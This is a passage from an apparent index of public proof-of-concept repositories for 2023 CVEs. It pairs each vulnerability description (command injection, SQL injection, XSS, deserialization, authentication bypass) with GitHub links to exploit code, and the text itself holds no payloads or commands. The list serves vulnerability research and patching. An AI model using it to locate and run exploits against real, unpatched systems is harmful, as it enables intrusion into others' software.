- [purseclab/CVE-2023-33768](https://github.com/purseclab/CVE-2023-33768)
- [Fr0stM0urne/CVE-2023-33768](https://github.com/Fr0stM0urne/CVE-2023-33768)

### CVE-2023-33781 (2023-06-07)

An issue in D-Link DIR-842V2 v1.0.3 allows attackers to execute arbitrary commands via importing a crafted file.

- [s0tr/CVE-2023-33781](https://github.com/s0tr/CVE-2023-33781)

### CVE-2023-33782 (2023-06-07)

D-Link DIR-842V2 v1.0.3 was discovered to contain a command injection vulnerability via the iperf3 diagnostics function.

- [s0tr/CVE-2023-33782](https://github.com/s0tr/CVE-2023-33782)

### CVE-2023-33802 (2023-07-26)

A buffer overflow in SumatraPDF Reader v3.4.6 allows attackers to cause a Denial of Service (DoS) via a crafted text file.

- [CDACesec/CVE-2023-33802](https://github.com/CDACesec/CVE-2023-33802)

### CVE-2023-33817 (2023-06-13)

hoteldruid v3.0.5 was discovered to contain a SQL injection vulnerability.

- [leekenghwa/CVE-2023-33817---SQL-Injection-found-in-HotelDruid-3.0.5](https://github.com/leekenghwa/CVE-2023-33817---SQL-Injection-found-in-HotelDruid-3.0.5)

### CVE-2023-33829 (2023-05-24)

A stored cross-site scripting (XSS) vulnerability in Cloudogu GmbH SCM Manager v1.2 to v1.60 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Description text field.

- [n3gox/CVE-2023-33829](https://github.com/n3gox/CVE-2023-33829)
- [3yujw7njai/CVE-2023-33829-POC](https://github.com/3yujw7njai/CVE-2023-33829-POC)

### CVE-2023-33831 (2023-09-18)

A remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA 1.1.13 allows attackers to execute arbitrary commands via a crafted POST request.

- [rodolfomarianocy/Unauthenticated-RCE-FUXA-CVE-2023-33831](https://github.com/rodolfomarianocy/Unauthenticated-RCE-FUXA-CVE-2023-33831)
- [btar1gan/exploit_CVE-2023-33831](https://github.com/btar1gan/exploit_CVE-2023-33831)

### CVE-2023-33902 (2023-07-12)

In bluetooth service, there is a missing permission check. This could lead to local information disclosure with no additional execution privileges needed.

- [uthrasri/CVE-2023-33902_single_file](https://github.com/uthrasri/CVE-2023-33902_single_file)

### CVE-2023-33977 (2023-06-06)

Kiwi TCMS is an open source test management system for both manual and automated testing. Kiwi TCMS allows users to upload attachments to test plans, test cases, etc. Earlier versions of Kiwi TCMS had introduced upload validators in order to prevent potentially dangerous files from being uploaded and a Content-Security-Policy definition to prevent cross-site-scripting attacks. The upload validation checks were not 100% robust, which left the possibility to circumvent them and upload a potentially dangerous file which allows execution of arbitrary JavaScript in the browser. Additionally, we've discovered that Nginx's `proxy_pass` directive will strip some headers, negating protections built into Kiwi TCMS when served behind a reverse proxy. This issue has been addressed in version 12.4. Users are advised to upgrade. Users unable to upgrade who are serving Kiwi TCMS behind a reverse proxy should make sure that additional header values are still passed to the client browser. If they aren't, redefine them inside the proxy configuration.

- [mnqazi/CVE-2023-33977](https://github.com/mnqazi/CVE-2023-33977)

### CVE-2023-34034 (2023-07-19)

Using "**" as a pattern in Spring Security configuration for WebFlux creates a mismatch in pattern matching between Spring Security and Spring WebFlux, and the potential for a security bypass.

- [hotblac/cve-2023-34034](https://github.com/hotblac/cve-2023-34034)

### CVE-2023-34035 (2023-07-18)

Spring Security versions 5.8 prior to 5.8.5, 6.0 prior to 6.0.5, and 6.1 prior to 6.1.2 could be susceptible to authorization rule misconfiguration if the application uses requestMatchers(String) and multiple servlets, one of them being Spring MVC’s DispatcherServlet. (DispatcherServlet is a Spring MVC component that maps HTTP endpoints to methods on @Controller-annotated classes.)

Specifically, an application is vulnerable when all of the following are true:

- Spring MVC is on the classpath
- Spring Security is securing more than one servlet in a single application (one of them being Spring MVC’s DispatcherServlet)
- The application uses requestMatchers(String) to refer to endpoints that are not Spring MVC endpoints

An application is not vulnerable if any of the following is true:

- The application does not have Spring MVC on the classpath
- The application secures no servlets other than Spring MVC’s DispatcherServlet
- The application uses requestMatchers(String) only for Spring MVC endpoints

- [mouadk/CVE-2023-34035-Poc](https://github.com/mouadk/CVE-2023-34035-Poc)
- [jzheaux/cve-2023-34035-mitigations](https://github.com/jzheaux/cve-2023-34035-mitigations)

### CVE-2023-34039 (2023-08-29)

Aria Operations for Networks contains an Authentication Bypass vulnerability due to a lack of unique cryptographic key generation. A malicious actor with network access to Aria Operations for Networks could bypass SSH authentication to gain access to the Aria Operations for Networks CLI.

- [sinsinology/CVE-2023-34039](https://github.com/sinsinology/CVE-2023-34039)
- [CharonDefalt/CVE-2023-34039](https://github.com/CharonDefalt/CVE-2023-34039)
- [Cyb3rEnthusiast/CVE-2023-34039](https://github.com/Cyb3rEnthusiast/CVE-2023-34039)
- [syedhafiz1234/CVE-2023-34039](https://github.com/syedhafiz1234/CVE-2023-34039)
- [adminxb/CVE-2023-34039](https://github.com/adminxb/CVE-2023-34039)

### CVE-2023-34040 (2023-08-24)

In Spring for Apache Kafka 3.0.9 and earlier and versions 2.9.10 and earlier, a possible deserialization attack vector existed, but only if unusual configuration was applied. An attacker would have to construct a malicious serialized object in one of the deserialization exception record headers.

Specifically, an application is vulnerable when all of the following are true:

- The user does not configure an ErrorHandlingDeserializer for the key and/or value of the record
- The user explicitly sets the container properties checkDeserExWhenKeyNull and/or checkDeserExWhenValueNull to true
- The user allows untrusted sources to publish to a Kafka topic

By default, these properties are false, and the container only attempts to deserialize the headers if an ErrorHandlingDeserializer is configured. The ErrorHandlingDeserializer prevents the vulnerability by removing any such malicious headers before processing the record.

- [Contrast-Security-OSS/Spring-Kafka-POC-CVE-2023-34040](https://github.com/Contrast-Security-OSS/Spring-Kafka-POC-CVE-2023-34040)
- [pyn3rd/CVE-2023-34040](https://github.com/pyn3rd/CVE-2023-34040)
- [buiduchoang24/CVE-2023-34040](https://github.com/buiduchoang24/CVE-2023-34040)
- [huyennhat-dev/cve-2023-34040](https://github.com/huyennhat-dev/cve-2023-34040)

### CVE-2023-34050 (2023-10-19)

In Spring AMQP versions 1.0.0 to 2.4.16 and 3.0.0 to 3.0.9, allowed list patterns for deserializable class names were added to Spring AMQP, allowing users to lock down deserialization of data in messages from untrusted sources; however, by default, when no allowed list was provided, all classes could be deserialized.

Specifically, an application is vulnerable if:

- the SimpleMessageConverter or SerializerMessageConverter is used
- the user does not configure allowed list patterns
- untrusted message originators gain permissions to write messages to the RabbitMQ broker to send malicious content

- [X1r0z/spring-amqp-deserialization](https://github.com/X1r0z/spring-amqp-deserialization)

### CVE-2023-34051 (2023-10-20)

VMware Aria Operations for Logs contains an authentication bypass vulnerability. An unauthenticated, malicious actor can inject files into the operating system of an impacted appliance which can result in remote code execution.

- [horizon3ai/CVE-2023-34051](https://github.com/horizon3ai/CVE-2023-34051)

### CVE-2023-34092 (2023-06-01)

Vite provides frontend tooling. Prior to versions 2.9.16, 3.2.7, 4.0.5, 4.1.5, 4.2.3, and 4.3.9, the Vite server option `server.fs.deny` can be bypassed using a double forward-slash (//), which allows any unauthenticated user to read files from the Vite root path of the application, including those covered by the default `fs.deny` settings (`['.env', '.env.*', '*.{crt,pem}']`). Only users explicitly exposing the Vite dev server to the network (using `--host` or the `server.host` config option) are affected, and only files in the immediate Vite project root folder could be exposed. This issue is fixed in the versions listed above.

- [FlapyPan/test-cve-2023-34092](https://github.com/FlapyPan/test-cve-2023-34092)

### CVE-2023-34096 (2023-06-08)

Thruk is a multibackend monitoring webinterface which currently supports Naemon, Icinga, Shinken and Nagios as backends. In versions 3.06 and prior, the file `panorama.pm` is vulnerable to a Path Traversal vulnerability which allows an attacker to upload a file to any folder which has write permissions on the affected system. The parameter location is not filtered, validated or sanitized and it accepts any kind of characters. For a path traversal attack, the only characters required were the dot (`.`) and the slash (`/`). A fix is available in version 3.06.2.

- [galoget/Thruk-CVE-2023-34096](https://github.com/galoget/Thruk-CVE-2023-34096)

### CVE-2023-34152 (2023-05-30)

A vulnerability was found in ImageMagick. This security flaw causes a remote code execution vulnerability in OpenBlob when built with --enable-pipes configured.

- [overgrowncarrot1/ImageTragick_CVE-2023-34152](https://github.com/overgrowncarrot1/ImageTragick_CVE-2023-34152)
- [SudoIndividual/CVE-2023-34152](https://github.com/SudoIndividual/CVE-2023-34152)

### CVE-2023-34212 (2023-06-12)

The JndiJmsConnectionFactoryProvider Controller Service, along with the ConsumeJMS and PublishJMS Processors, in Apache NiFi 1.8.0 through 1.21.0 allow an authenticated and authorized user to configure URL and library properties that enable deserialization of untrusted data from a remote location.

The resolution validates the JNDI URL and restricts locations to a set of allowed schemes.

You are recommended to upgrade to version 1.22.0 or later which fixes this issue.

- [mbadanoiu/CVE-2023-34212](https://github.com/mbadanoiu/CVE-2023-34212)

### CVE-2023-34312 (2023-06-01)

In Tencent QQ through 9.7.8.29039 and TIM through 3.4.7.22084, QQProtect.exe and QQProtectEngine.dll do not validate pointers from inter-process communication, which leads to a write-what-where condition.

- [vi3t1/qq-tim-elevation](https://github.com/vi3t1/qq-tim-elevation)
- [lan1oc/CVE-2023-34312-exp](https://github.com/lan1oc/CVE-2023-34312-exp)

### CVE-2023-34362 (2023-06-02)

In Progress MOVEit Transfer before 2021.0.6 (13.0.6), 2021.1.4 (13.1.4), 2022.0.4 (14.0.4), 2022.1.5 (14.1.5), and 2023.0.1 (15.0.1), a SQL injection vulnerability has been found in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain access to MOVEit Transfer's database. Depending on the database engine being used (MySQL, Microsoft SQL Server, or Azure SQL), an attacker may be able to infer information about the structure and contents of the database, and execute SQL statements that alter or delete database elements. NOTE: this is exploited in the wild in May and June 2023; exploitation of unpatched systems can occur via HTTP or HTTPS. All versions (e.g., 2020.0 and 2019x) before the five explicitly mentioned versions are affected, including older unsupported versions.

- [deepinstinct/MOVEit_CVE-2023-34362_IOCs](https://github.com/deepinstinct/MOVEit_CVE-2023-34362_IOCs)
- [horizon3ai/CVE-2023-34362](https://github.com/horizon3ai/CVE-2023-34362)
- [sfewer-r7/CVE-2023-34362](https://github.com/sfewer-r7/CVE-2023-34362)
- [kenbuckler/MOVEit-CVE-2023-34362](https://github.com/kenbuckler/MOVEit-CVE-2023-34362)
- [Malwareman007/CVE-2023-34362](https://github.com/Malwareman007/CVE-2023-34362)
- [toorandom/moveit-payload-decrypt-CVE-2023-34362](https://github.com/toorandom/moveit-payload-decrypt-CVE-2023-34362)
- [errorfiathck/MOVEit-Exploit](https://github.com/errorfiathck/MOVEit-Exploit)
- [Chinyemba-ck/MOVEit-CVE-2023-34362](https://github.com/Chinyemba-ck/MOVEit-CVE-2023-34362)
- [glen-pearson/MoveIT-CVE-2023-34362-RCE](https://github.com/glen-pearson/MoveIT-CVE-2023-34362-RCE)
- [aditibv/MOVEit-CVE-2023-34362](https://github.com/aditibv/MOVEit-CVE-2023-34362)

### CVE-2023-34458 (2023-07-13)

mx-chain-go is the official implementation of the MultiversX blockchain protocol, written in golang. When executing a relayed transaction, if the inner transaction failed, it would have increased the inner transaction's sender account nonce. This could have contributed to a limited DoS attack on a targeted account. The fix is a breaking change so a new flag `RelayedNonceFixEnableEpoch` was needed. This was a strict processing issue while validating blocks on a chain. This vulnerability has been patched in version 1.4.17.

- [miguelc49/CVE-2023-34458-2](https://github.com/miguelc49/CVE-2023-34458-2)
- [miguelc49/CVE-2023-34458-1](https://github.com/miguelc49/CVE-2023-34458-1)
- [miguelc49/CVE-2023-34458-3](https://github.com/miguelc49/CVE-2023-34458-3)

### CVE-2023-34468 (2023-06-12)

The DBCPConnectionPool and HikariCPConnectionPool Controller Services in Apache NiFi 0.0.2 through 1.21.0 allow an authenticated and authorized user to configure a Database URL with the H2 driver that enables custom code execution.

The resolution validates the Database URL and rejects H2 JDBC locations.

You are recommended to upgrade to version 1.22.0 or later which fixes this issue.

- [mbadanoiu/CVE-2023-34468](https://github.com/mbadanoiu/CVE-2023-34468)

### CVE-2023-34537 (2023-06-13)

A Reflected XSS was discovered in HotelDruid version 3.0.5; an attacker can inject malicious code into a parameter of the affected webpage to trick the user's browser and/or exfiltrate data.

- [leekenghwa/CVE-2023-34537---XSS-reflected--found-in-HotelDruid-3.0.5](https://github.com/leekenghwa/CVE-2023-34537---XSS-reflected--found-in-HotelDruid-3.0.5)

### CVE-2023-34584
- [fu2x2000/-CVE-2023-34584](https://github.com/fu2x2000/-CVE-2023-34584)

### CVE-2023-34598 (2023-06-29)

Gibbon v25.0.0 is vulnerable to a Local File Inclusion (LFI) where it's possible to include the content of several files present in the installation folder in the server's response.

- [maddsec/CVE-2023-34598](https://github.com/maddsec/CVE-2023-34598)
- [Lserein/CVE-2023-34598](https://github.com/Lserein/CVE-2023-34598)

### CVE-2023-34599 (2023-06-29)

Multiple Cross-Site Scripting (XSS) vulnerabilities have been identified in Gibbon v25.0.0, which enable attackers to execute arbitrary JavaScript code.

- [maddsec/CVE-2023-34599](https://github.com/maddsec/CVE-2023-34599)

### CVE-2023-34600 (2023-06-20)

Adiscon LogAnalyzer v4.1.13 and before is vulnerable to SQL Injection.

- [costacoco/Adiscon](https://github.com/costacoco/Adiscon)

### CVE-2023-34634 (2023-08-01)

Greenshot 1.2.10 and below allows arbitrary code execution because .NET content is insecurely deserialized when a .greenshot file is opened.

- [radman404/CVE-2023-34634](https://github.com/radman404/CVE-2023-34634)

### CVE-2023-34830 (2023-06-27)

i-doit Open v24 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the timeout parameter on the login page.

- [leekenghwa/CVE-2023-34830---Reflected-XSS-found-in-I-doit-Open-v24-and-below](https://github.com/leekenghwa/CVE-2023-34830---Reflected-XSS-found-in-I-doit-Open-v24-and-below)

### CVE-2023-34835 (2023-06-27)

A Cross Site Scripting vulnerability in Microworld Technologies eScan Management console v.14.0.1400.2281 allows a remote attacker to execute arbitrary JavaScript code via a vulnerable delete_file parameter.

- [sahiloj/CVE-2023-34835](https://github.com/sahiloj/CVE-2023-34835)

### CVE-2023-34836 (2023-06-27)

A Cross Site Scripting vulnerability in Microworld Technologies eScan Management console v.14.0.1400.2281 allows a remote attacker to execute arbitrary code via a crafted script to the Dtltyp and ListName parameters.

- [sahiloj/CVE-2023-34836](https://github.com/sahiloj/CVE-2023-34836)

### CVE-2023-34837 (2023-06-27)

A Cross Site Scripting vulnerability in Microworld Technologies eScan Management console v.14.0.1400.2281 allows a remote attacker to execute arbitrary code via the vulnerable GrpPath parameter.

- [sahiloj/CVE-2023-34837](https://github.com/sahiloj/CVE-2023-34837)

### CVE-2023-34838 (2023-06-27)

A Cross Site Scripting vulnerability in Microworld Technologies eScan Management console v.14.0.1400.2281 allows a remote attacker to execute arbitrary code via a crafted script to the Description parameter.

- [sahiloj/CVE-2023-34838](https://github.com/sahiloj/CVE-2023-34838)

### CVE-2023-34839 (2023-06-27)

A Cross Site Request Forgery (CSRF) vulnerability in Issabel issabel-pbx v.4.0.0-6 allows a remote attacker to gain privileges via a custom CSRF exploit against the create-new-user function in the application.

- [sahiloj/CVE-2023-34839](https://github.com/sahiloj/CVE-2023-34839)

### CVE-2023-34840 (2023-06-30)

angular-ui-notification v0.1.0, v0.2.0, and v0.3.6 was discovered to contain a cross-site scripting (XSS) vulnerability.

- [Xh4H/CVE-2023-34840](https://github.com/Xh4H/CVE-2023-34840)

### CVE-2023-34843 (2023-06-28)

Traggo Server 0.3.0 is vulnerable to directory traversal via a crafted GET request.

- [rootd4ddy/CVE-2023-34843](https://github.com/rootd4ddy/CVE-2023-34843)

### CVE-2023-34845 (2023-06-16)

Bludit v3.14.1 was discovered to contain an arbitrary file upload vulnerability in the component /admin/new-content. This vulnerability allows attackers to execute arbitrary web scripts or HTML via uploading a crafted SVG file. NOTE: the product's security model is that users are trusted by the administrator to insert arbitrary content (users cannot create their own accounts through self-registration).

- [r4vanan/CVE-2023-34845](https://github.com/r4vanan/CVE-2023-34845)

### CVE-2023-34852 (2023-06-15)

PublicCMS <=V4.0.202302 is vulnerable to Insecure Permissions.

- [funny-kill/CVE-2023-34852](https://github.com/funny-kill/CVE-2023-34852)

### CVE-2023-34853 (2023-08-22)

Buffer Overflow vulnerability in Supermicro motherboard X12DPG-QR 1.4b allows local attackers to hijack control flow via manipulation of SmcSecurityEraseSetupVar variable.

- [risuxx/CVE-2023-34853](https://github.com/risuxx/CVE-2023-34853)

### CVE-2023-34924 (2023-06-26)

H3C Magic B1STW B1STV100R012 was discovered to contain a stack overflow via the function SetAPInfoById. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted POST request.

- [ChrisL0tus/CVE-2023-34924](https://github.com/ChrisL0tus/CVE-2023-34924)

### CVE-2023-34960 (2023-08-01)

A command injection vulnerability in the wsConvertPpt component of Chamilo v1.11.* up to v1.11.18 allows attackers to execute arbitrary commands via a SOAP API call with a crafted PowerPoint name.

- [Aituglo/CVE-2023-34960](https://github.com/Aituglo/CVE-2023-34960)
- [Jenderal92/CHAMILO-CVE-2023-34960](https://github.com/Jenderal92/CHAMILO-CVE-2023-34960)
- [YongYe-Security/CVE-2023-34960](https://github.com/YongYe-Security/CVE-2023-34960)
- [ThatNotEasy/CVE-2023-34960](https://github.com/ThatNotEasy/CVE-2023-34960)
- [Mantodkaz/CVE-2023-34960](https://github.com/Mantodkaz/CVE-2023-34960)
- [tucommenceapousser/CVE-2023-34960-ex](https://github.com/tucommenceapousser/CVE-2023-34960-ex)
- [dvtarsoul/ChExp](https://github.com/dvtarsoul/ChExp)

### CVE-2023-34965 (2023-06-13)

SSPanel-Uim 2023.3 does not restrict access to the /link/ interface which can lead to a leak of user information.

- [AgentY0/CVE-2023-34965](https://github.com/AgentY0/CVE-2023-34965)

### CVE-2023-34992 (2023-10-10)

An improper neutralization of special elements used in an OS command ('OS command injection') in Fortinet FortiSIEM version 7.0.0 and 6.7.0 through 6.7.5 and 6.6.0 through 6.6.3 and 6.5.0 through 6.5.1 and 6.4.0 through 6.4.2 allows an attacker to execute unauthorized code or commands via crafted API requests.

- [horizon3ai/CVE-2023-34992](https://github.com/horizon3ai/CVE-2023-34992)
- [d0rb/CVE-2023-34992-Checker](https://github.com/d0rb/CVE-2023-34992-Checker)

### CVE-2023-35001 (2023-07-05)

Linux Kernel nftables Out-Of-Bounds Read/Write Vulnerability: nft_byteorder poorly handled VM register contents when CAP_NET_ADMIN is held in any user or network namespace.

- [synacktiv/CVE-2023-35001](https://github.com/synacktiv/CVE-2023-35001)
- [syedhafiz1234/nftables-oob-read-write-exploit-CVE-2023-35001-](https://github.com/syedhafiz1234/nftables-oob-read-write-exploit-CVE-2023-35001-)
- [mrbrelax/Exploit_CVE-2023-35001](https://github.com/mrbrelax/Exploit_CVE-2023-35001)

### CVE-2023-35078 (2023-07-25)

An authentication bypass vulnerability in Ivanti EPMM allows unauthorized users to access restricted functionality or resources of the application without proper authentication.

- [vchan-in/CVE-2023-35078-Exploit-POC](https://github.com/vchan-in/CVE-2023-35078-Exploit-POC)
- [lager1/CVE-2023-35078](https://github.com/lager1/CVE-2023-35078)
- [raytheon0x21/CVE-2023-35078](https://github.com/raytheon0x21/CVE-2023-35078)
- [synfinner/CVE-2023-35078](https://github.com/synfinner/CVE-2023-35078)
- [emanueldosreis/nmap-CVE-2023-35078-Exploit](https://github.com/emanueldosreis/nmap-CVE-2023-35078-Exploit)
- [Blue-number/CVE-2023-35078](https://github.com/Blue-number/CVE-2023-35078)
- [0nsec/CVE-2023-35078](https://github.com/0nsec/CVE-2023-35078)

### CVE-2023-35080 (2023-11-14)

A vulnerability has been identified in the Ivanti Secure Access Windows client, which could allow a locally authenticated attacker to exploit a vulnerable configuration, potentially leading to various security risks, including the escalation of privileges, denial of service, or information disclosure.

- [HopHouse/Ivanti-Pulse_VPN-Client_Exploit-CVE-2023-35080_Privilege-escalation](https://github.com/HopHouse/Ivanti-Pulse_VPN-Client_Exploit-CVE-2023-35080_Privilege-escalation)

### CVE-2023-35082 (2023-08-15)

An authentication bypass vulnerability in Ivanti EPMM 11.10 and older allows unauthorized users to access restricted functionality or resources of the application without proper authentication. This vulnerability is distinct from CVE-2023-35078, announced earlier.

- [Chocapikk/CVE-2023-35082](https://github.com/Chocapikk/CVE-2023-35082)

### CVE-2023-35086 (2023-07-21)

A format string vulnerability was identified in ASUS RT-AX56U V2 & RT-AC86U. This vulnerability is caused by directly using input as a format string when calling syslog in the logmessage_normal function, in the do_detwan_cgi module of httpd. A remote attacker with administrator privilege can exploit this vulnerability to perform remote arbitrary code execution, arbitrary system operation or disrupt service.

This issue affects RT-AX56U V2: 3.0.0.4.386_50460; RT-AC86U: 3.0.0.4_386_51529.

- [tin-z/CVE-2023-35086-POC](https://github.com/tin-z/CVE-2023-35086-POC)

### CVE-2023-35636 (2023-12-12)

Microsoft Outlook Information Disclosure Vulnerability

- [duy-31/CVE-2023-35636](https://github.com/duy-31/CVE-2023-35636)

### CVE-2023-35671 (2023-09-11)

In onHostEmulationData of HostEmulationManager.java, there is a possible way for a general purpose NFC reader to read the full card number and expiry details when the device is in locked screen mode due to a logic error in the code. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.

- [MrTiz/CVE-2023-35671](https://github.com/MrTiz/CVE-2023-35671)

### CVE-2023-35674 (2023-09-11)

In onCreate of WindowState.java, there is a possible way to launch a background activity due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.

- [Thampakon/CVE-2023-35674](https://github.com/Thampakon/CVE-2023-35674)
- [SpiralBL0CK/Guide-and-theoretical-code-for-CVE-2023-35674](https://github.com/SpiralBL0CK/Guide-and-theoretical-code-for-CVE-2023-35674)

### CVE-2023-35687 (2023-09-11)

In MtpPropertyValue of MtpProperty.h, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.

- [pazhanivel07/frameworks_av_AOSP_10_r33_CVE-2023-35687_CVE-2023-35679](https://github.com/pazhanivel07/frameworks_av_AOSP_10_r33_CVE-2023-35687_CVE-2023-35679)

### CVE-2023-35744 (2024-05-03)

D-Link DAP-2622 DDP Configuration Restore Server IPv6 Address Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability.

The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20071.

- [ADSSA-IT/CVE-2023-35744](https://github.com/ADSSA-IT/CVE-2023-35744)

### CVE-2023-35793 (2023-09-26)

An issue was discovered in Cassia Access Controller 2.1.1.2303271039. Establishing a web SSH session to gateways is vulnerable to Cross Site Request Forgery (CSRF) attacks.

- [Dodge-MPTC/CVE-2023-35793-CSRF-On-Web-SSH](https://github.com/Dodge-MPTC/CVE-2023-35793-CSRF-On-Web-SSH)

### CVE-2023-35794 (2023-10-27)

An issue was discovered in Cassia Access Controller 2.1.1.2303271039. The Web SSH terminal endpoint (spawned console) can be accessed without authentication. Specifically, there is no session cookie validation on the Access Controller; instead, there is only Basic Authentication to the SSH console.

- [Dodge-MPTC/CVE-2023-35794-WebSSH-Hijacking](https://github.com/Dodge-MPTC/CVE-2023-35794-WebSSH-Hijacking)

### CVE-2023-35801 (2023-06-23)

A directory traversal vulnerability in Safe Software FME Server before 2022.2.5 allows an attacker to bypass validation when editing a network-based resource connection, resulting in the unauthorized reading and writing of arbitrary files. Successful exploitation requires an attacker to have access to a user account with write privileges. FME Flow 2023.0 is also a fixed version.

- [trustcves/CVE-2023-35801](https://github.com/trustcves/CVE-2023-35801)

### CVE-2023-35803 (2023-10-04)

IQ Engine before 10.6r2 on Extreme Network AP devices has a Buffer Overflow.

- [lachlan2k/CVE-2023-35803](https://github.com/lachlan2k/CVE-2023-35803)

### CVE-2023-35813 (2023-06-17)

Multiple Sitecore products allow remote code execution. This affects Experience Manager, Experience Platform, and Experience Commerce through 10.3.

- [aalexpereira/CVE-2023-35813](https://github.com/aalexpereira/CVE-2023-35813)
- [BagheeraAltered/CVE-2023-35813-PoC](https://github.com/BagheeraAltered/CVE-2023-35813-PoC)

### CVE-2023-35828 (2023-06-18)

An issue was discovered in the Linux kernel before 6.3.2. A use-after-free was found in renesas_usb3_remove in drivers/usb/gadget/udc/renesas_usb3.c.

- [Trinadh465/linux-4.19.72_CVE-2023-35828](https://github.com/Trinadh465/linux-4.19.72_CVE-2023-35828)

### CVE-2023-35840 (2023-06-19)

_joinPath in elFinderVolumeLocalFileSystem.class.php in elFinder before 2.1.62 allows path traversal in the PHP LocalVolumeDriver connector.

- [afine-com/CVE-2023-35840](https://github.com/afine-com/CVE-2023-35840)

### CVE-2023-35843 (2023-06-19)

NocoDB through 0.106.0 (or 0.109.1) has a path traversal vulnerability that allows an unauthenticated attacker to access arbitrary files on the server by manipulating the path parameter of the /download route. This vulnerability could allow an attacker to access sensitive files and data on the server, including configuration files, source code, and other sensitive information.

- [Lserein/CVE-2023-35843](https://github.com/Lserein/CVE-2023-35843)
- [b3nguang/CVE-2023-35843](https://github.com/b3nguang/CVE-2023-35843)

### CVE-2023-35844 (2023-06-19)

packages/backend/src/routers in Lightdash before 0.510.3 has insecure file endpoints, e.g., they allow .. directory traversal and do not ensure that an intended file extension (.csv or .png) is used.

- [Lserein/CVE-2023-35844](https://github.com/Lserein/CVE-2023-35844)

### CVE-2023-35854 (2023-06-20)

Zoho ManageEngine ADSelfService Plus through 6113 has an authentication bypass that can be exploited to steal the domain controller session token for identity spoofing, thereby achieving the privileges of the domain controller administrator. NOTE: the vendor's perspective is that they have "found no evidence or detail of a security vulnerability."

- [bluestarry33/exp](https://github.com/bluestarry33/exp)

### CVE-2023-35885 (2023-06-20)

CloudPanel 2 before 2.3.1 has insecure file-manager cookie authentication.

- [datackmy/FallingSkies-CVE-2023-35885](https://github.com/datackmy/FallingSkies-CVE-2023-35885)
- [Chocapikk/CVE-2023-35885](https://github.com/Chocapikk/CVE-2023-35885)

### CVE-2023-35985 (2023-11-27)

An arbitrary file creation vulnerability exists in the Javascript exportDataObject API of Foxit Reader 12.1.3.15356 due to a failure to properly validate a dangerous extension. A specially crafted malicious file can create files at arbitrary locations, which can lead to arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially-crafted malicious site if the browser plugin extension is enabled.

- [SpiralBL0CK/-CVE-2023-35985](https://github.com/SpiralBL0CK/-CVE-2023-35985)
- [N00BIER/CVE-2023-35985](https://github.com/N00BIER/CVE-2023-35985)

### CVE-2023-36003 (2023-12-12)

XAML Diagnostics Elevation of Privilege Vulnerability

- [m417z/CVE-2023-36003-POC](https://github.com/m417z/CVE-2023-36003-POC)
- [baph0m3th/CVE-2023-36003](https://github.com/baph0m3th/CVE-2023-36003)

### CVE-2023-36025 (2023-11-14)

Windows SmartScreen Security Feature Bypass Vulnerability

- [ka7ana/CVE-2023-36025](https://github.com/ka7ana/CVE-2023-36025)
- [J466Y/test_CVE-2023-36025](https://github.com/J466Y/test_CVE-2023-36025)
- [coolman6942o/-EXPLOIT-CVE-2023-36025](https://github.com/coolman6942o/-EXPLOIT-CVE-2023-36025)

### CVE-2023-36076 (2023-09-01)

SQL Injection vulnerability in smanga version 3.1.9 and earlier allows remote attackers to execute arbitrary code and gain sensitive information via the mediaId, mangaId, and userId parameters in php/history/add.php.

- [deIndra/CVE-2023-36076](https://github.com/deIndra/CVE-2023-36076)

### CVE-2023-36085 (2023-10-24)

sisqualWFM 7.1.319.103 through 7.1.319.111 for Android has a host header injection vulnerability in its "/sisqualIdentityServer/core/" endpoint. By modifying the HTTP Host header, an attacker can change webpage links and even redirect users to arbitrary or malicious locations. This can lead to phishing attacks, malware distribution, and unauthorized access to sensitive resources.

- [omershaik0/CVE-2023-36085_SISQUALWFM-Host-Header-Injection](https://github.com/omershaik0/CVE-2023-36085_SISQUALWFM-Host-Header-Injection)

### CVE-2023-36109 (2023-09-20)

Buffer Overflow vulnerability in JerryScript version 3.0 allows remote attackers to execute arbitrary code via the ecma_stringbuilder_append_raw component at /jerry-core/ecma/base/ecma-helpers-string.c.

- [Limesss/CVE-2023-36109](https://github.com/Limesss/CVE-2023-36109)

### CVE-2023-36123 (2023-10-06)

Directory Traversal vulnerability in Hex-Dragon Plain Craft Launcher 2 version Alpha 1.3.9 allows local attackers to execute arbitrary code and gain sensitive information.

- [9Bakabaka/CVE-2023-36123](https://github.com/9Bakabaka/CVE-2023-36123)

### CVE-2023-36143 (2023-06-30)

Maxprint Maxlink 1200G v3.4.11E has an OS command injection vulnerability in the "Diagnostic tool" functionality of the device.

- [leonardobg/CVE-2023-36143](https://github.com/leonardobg/CVE-2023-36143)
- [RobinTrigon/CVE-2023-36143](https://github.com/RobinTrigon/CVE-2023-36143)

### CVE-2023-36144 (2023-06-30)

An authentication bypass in Intelbras Switch SG 2404 MR in firmware 1.00.54 allows an unauthenticated attacker to download the backup file of the device, exposing critical information about the device configuration.

- [leonardobg/CVE-2023-36144](https://github.com/leonardobg/CVE-2023-36144)

### CVE-2023-36146 (2023-06-30)

A Stored Cross-Site Scripting (XSS) vulnerability was found in Multilaser RE 170 using firmware 2.2.6733.

- [leonardobg/CVE-2023-36146](https://github.com/leonardobg/CVE-2023-36146)

### CVE-2023-36158 (2023-08-03)

Cross Site Scripting (XSS) vulnerability in sourcecodester Toll Tax Management System 1.0 allows remote attackers to run arbitrary code via the First Name and Last Name fields on the My Account page.

- [unknown00759/CVE-2023-36158](https://github.com/unknown00759/CVE-2023-36158)

### CVE-2023-36159 (2023-08-03)

Cross Site Scripting (XSS) vulnerability in sourcecodester Lost and Found Information System 1.0 allows remote attackers to run arbitrary code via the First Name, Middle Name and Last Name fields on the Create User page.

